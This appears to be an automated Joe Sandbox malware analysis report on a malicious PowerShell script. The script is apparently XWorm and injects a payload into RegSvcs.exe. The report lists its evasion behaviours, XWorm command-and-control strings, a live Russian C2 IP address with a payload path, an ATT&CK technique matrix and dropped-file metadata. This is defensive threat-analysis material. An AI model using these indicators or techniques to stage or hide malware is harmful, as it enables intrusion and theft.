          Source: Amcache.hve.10.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
          Source: Amcache.hve.10.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42C000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 42E000Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7AF008Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\ipconfig.exe "C:\Windows\system32\ipconfig.exe" /flushdnsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002857000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002866000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
          Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002866000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.000000000294B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\^q@\^q-PING!<Xwormmm>Program Manager<Xwormmm>2034781
          Source: RegSvcs.exe, 00000003.00000002.3280175291.000000000294B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002CC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managert-^q
          Source: RegSvcs.exe, 00000003.00000002.3280175291.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002BF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: @\^q@\^q'PING!<Xwormmm>Program Manager<Xwormmm>0
          Source: RegSvcs.exe, 00000003.00000002.3280175291.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002CC7000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002BF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
          Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002CC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^qt
          Source: RegSvcs.exe, 00000003.00000002.3280175291.00000000029C0000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002BF9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q'PING!<Xwormmm>Program Manager<Xwormmm>0Te^q
          Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002866000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.000000000294B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2034781
          Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002866000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.000000000294B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q-PING!<Xwormmm>Program Manager<Xwormmm>2034781Te^q
          Source: RegSvcs.exe, 00000003.00000002.3280175291.0000000002866000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.000000000294B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002859000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager\
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
          Source: Amcache.hve.10.drBinary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
          Source: Amcache.hve.10.drBinary or memory string: msmpeng.exe
          Source: Amcache.hve.10.drBinary or memory string: c:\program files\windows defender\msmpeng.exe
          Source: Amcache.hve.10.drBinary or memory string: MsMpEng.exe
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 00000003.00000002.3280175291.0000000002882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5252, type: MEMORYSTR

          Remote Access Functionality

          barindex
          Source: Yara matchFile source: 00000003.00000002.3280175291.0000000002882000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5252, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
          Windows Management Instrumentation
          1
          DLL Side-Loading
          212
          Process Injection
          1
          Disable or Modify Tools
          OS Credential Dumping131
          Security Software Discovery
          Remote Services11
          Archive Collected Data
          1
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
          DLL Side-Loading
          131
          Virtualization/Sandbox Evasion
          LSASS Memory2
          Process Discovery
          Remote Desktop Protocol1
          Clipboard Data
          1
          Non-Standard Port
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)212
          Process Injection
          Security Account Manager131
          Virtualization/Sandbox Evasion
          SMB/Windows Admin SharesData from Network Shared Drive1
          Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          Deobfuscate/Decode Files or Information
          NTDS1
          Application Window Discovery
          Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
          Obfuscated Files or Information
          LSA Secrets1
          System Network Configuration Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
          Software Packing
          Cached Domain Credentials2
          File and Directory Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
          DLL Side-Loading
          DCSync13
          System Information Discovery
          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          92.255.57.155.ps18%VirustotalBrowse
          92.255.57.155.ps113%ReversingLabsWin32.Trojan.Generic
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          No contacted domains info
          NameMaliciousAntivirus DetectionReputation
          92.255.57.155false
            high
            NameSourceMaliciousAntivirus DetectionReputation
            http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1680199968.000001B58AA09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://go.micropowershell.exe, 00000000.00000002.1680199968.000001B58A454000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://contoso.com/powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1680199968.000001B58AA09000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://contoso.com/Licensepowershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://contoso.com/Iconpowershell.exe, 00000000.00000002.1691262828.000001B599316000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://upx.sf.netAmcache.hve.10.drfalse
                              high
                              https://aka.ms/pscore68powershell.exe, 00000000.00000002.1680199968.000001B589171000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1680199968.000001B589171000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.3280175291.0000000002821000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1680199968.000001B589398000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1699213925.000001B5A128D000.00000004.00000020.00020000.00000000.sdmpfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    92.255.57.155
                                    unknownRussian Federation
                                    42253TELSPRUtrue
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1581903
                                    Start date and time:2024-12-29 09:48:06 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 24s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                    Number of analysed new started processes analysed:12
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:92.255.57.155.ps1
                                    Detection:MAL
                                    Classification:mal100.troj.evad.winPS1@7/10@0/1
                                    EGA Information:
                                    • Successful, ratio: 50%
                                    HCA Information:
                                    • Successful, ratio: 96%
                                    • Number of executed functions: 63
                                    • Number of non-executed functions: 2
                                    Cookbook Comments:
                                    • Found application associated with file extension: .ps1
                                    • Override analysis time to 240000 for current running targets taking high CPU consumption
                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.12.23.50, 13.107.246.63, 40.126.53.10
                                    • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                    • Execution Graph export aborted for target powershell.exe, PID 6820 because it is empty
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    TimeTypeDescription
                                    03:48:56API Interceptor8x Sleep call for process: powershell.exe modified
                                    03:49:00API Interceptor4368467x Sleep call for process: RegSvcs.exe modified
                                    03:51:37API Interceptor1x Sleep call for process: WerFault.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    92.255.57.155anyrunsample.ps1Get hashmaliciousUnknownBrowse
                                    • 92.255.57.155/1/1.png
                                    https://reviewgustereports.com/Get hashmaliciousCAPTCHA Scam ClickFix, XWormBrowse
                                    • 92.255.57.155/1/1.png
                                    No context
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    TELSPRUpng2obj1_XClient.exeGet hashmaliciousXWormBrowse
                                    • 92.255.57.155
                                    Dm35sdidf3.exeGet hashmaliciousXWormBrowse
                                    • 92.255.57.155
                                    QP2uO3eN2p.ps1Get hashmaliciousXWormBrowse
                                    • 92.255.57.155
                                    WErY5oc4hl.ps1Get hashmaliciousXWormBrowse
                                    • 92.255.57.155
                                    NLXwvLjXPh.ps1Get hashmaliciousXWormBrowse
                                    • 92.255.57.155
                                    mhqxUdpe7V.ps1Get hashmaliciousXWormBrowse
                                    • 92.255.57.155
                                    MiGFg375KJ.exeGet hashmaliciousXWormBrowse
                                    • 92.255.57.155
                                    anyrunsample.ps1Get hashmaliciousUnknownBrowse
                                    • 92.255.57.155
                                    sEOELQpFOB.lnkGet hashmaliciousRedLineBrowse
                                    • 92.255.57.75
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.213876266779332
                                    Encrypted:false
                                    SSDEEP:192:MCBpk8Qiqz0BU/SaiRgt0GsNzuiFZZ24IO8a9:VB7QiVBU/SabtvezuiFZY4IO8a9
                                    MD5:9E154CB72CCF82F244806AB2E0076627
                                    SHA1:F853D611EB6B5C3F449ACFBC486AB013BE208EFE
                                    SHA-256:D5E8A89BBA393D8EE4D82DD23F5FC351E53136B0ADAB941ED823E942109FA91A
                                    SHA-512:2A17EE1B2447745E37F842DA22C35139C15D631159179992B47D498472C12F1247A6FB54791E2AF3CFED8A3E9EC56E737BA0EC998B74017849AB51E791BFCC82
                                    Malicious:false
                                    Reputation:low
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.9.9.3.5.8.6.5.3.2.0.9.6.1.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.9.9.3.5.8.6.5.9.6.1.5.8.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.7.b.8.d.c.6.6.-.0.0.c.b.-.4.1.6.9.-.9.a.4.1.-.b.d.6.3.1.1.8.6.8.6.3.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.4.1.5.9.c.c.2.-.b.1.c.6.-.4.3.e.3.-.8.c.2.e.-.5.7.1.1.1.e.1.a.c.3.3.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.e.g.S.v.c.s...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.4.8.4.-.0.0.0.1.-.0.0.1.4.-.0.3.3.7.-.a.3.7.f.c.e.5.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.1.9.6.9.7.7.1.b.2.f.0.2.2.f.9.a.8.6.d.7.7.a.c.4.d.4.d.2.3.9.b.e.c.d.f.0.8.d.0.7.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, Sun Dec 29 08:51:05 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):385553
                                    Entropy (8bit):3.3576009797663233
                                    Encrypted:false
                                    SSDEEP:3072:HjEBH8cvI+4uEq6cKxWLTgezeymxBn43MNsglVQHQ+:HjgHHJ4VYTgTy6KqVQw
                                    MD5:E56A4614A662E28146885ABB23FED56F
                                    SHA1:32C5E4888DE16CFBB2FB0F069E2E26B17F27403D
                                    SHA-256:C198035F419A72F58D0F0EC4A775D0E9EE7534929E6A40CFC2805D60637DE483
                                    SHA-512:B714F87E36ECD29C05C9AB5876C63D68E77DD2995F8EEF9C4A667E16E3033510F3193C8EA300EE7E7A764E104ABF6EBB4B9ED6DD20C832D1B9A38589E4D96EB3
                                    Malicious:false
                                    Reputation:low
                                    Preview:MDMP..a..... .......y.qg........................<...........$...D*......T+...s..........`.......8...........T...........hH..............h*..........T,..............................................................................eJ.......,......GenuineIntel............T.............qg....Q........................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8360
                                    Entropy (8bit):3.689361290662274
                                    Encrypted:false
                                    SSDEEP:192:R6l7wVeJ0h6R6Y2IS4ugmfZ8SprK89bn8sf9ONm:R6lXJi6R6YRSRgmfOcnPf9V
                                    MD5:9B2D7B74123825F8A32EE938C867E8FA
                                    SHA1:FFC93F7D0BF39A10DAC48212BCEFA27127068C4D
                                    SHA-256:F145810735061CAC3083B893E9063EFAF4067034EE10D73E04347E31E33098CF
                                    SHA-512:AABEA0B8C5DDF616428A11AF441F67054B484A83E654F4388A26D0581765085BEE31121E12E2B2ABE5C68EEE5D9595DF1FEE9B3E2C4E2D88B47D12631B8CF8DE
                                    Malicious:false
                                    Reputation:low
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.2.5.2.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4728
                                    Entropy (8bit):4.444708844389835
                                    Encrypted:false
                                    SSDEEP:48:cvIwWl8zsUJg77aI9u5WpW8VYBYm8M4J3cFn+q8vYYmDI8d:uIjfSI7QI7VdJuKXmDI8d
                                    MD5:42D53AD1A68E986974950AA9479A6688
                                    SHA1:E0B20720A3E000C5B2F8C982233CCB790177E9F2
                                    SHA-256:C4DEB110259CC36DB117C56E172D4ECC3396D6CB641382751C19D4E1EC8680F1
                                    SHA-512:858F1EB1EB5FD3BB768ABB8A253215A079671A01F1D7A16D5489BF6177ACF6DEB2F4C436BFEC4C47739A79981B3D14EECF6482CF22D6159C65C130B9EF5D30F2
                                    Malicious:false
                                    Reputation:low
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="652313" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):64
                                    Entropy (8bit):1.1940658735648508
                                    Encrypted:false
                                    SSDEEP:3:Nlllultnxj:NllU
                                    MD5:F93358E626551B46E6ED5A0A9D29BD51
                                    SHA1:9AECA90CCBFD1BEC2649D66DF8EBE64C13BACF03
                                    SHA-256:0347D1DE5FEA380ADFD61737ECD6068CB69FC466AC9C77F3056275D5FCAFDC0D
                                    SHA-512:D609B72F20BF726FD14D3F2EE91CCFB2A281FAD6BC88C083BFF7FCD177D2E59613E7E4E086DB73037E2B0B8702007C8F7524259D109AF64942F3E60BFCC49853
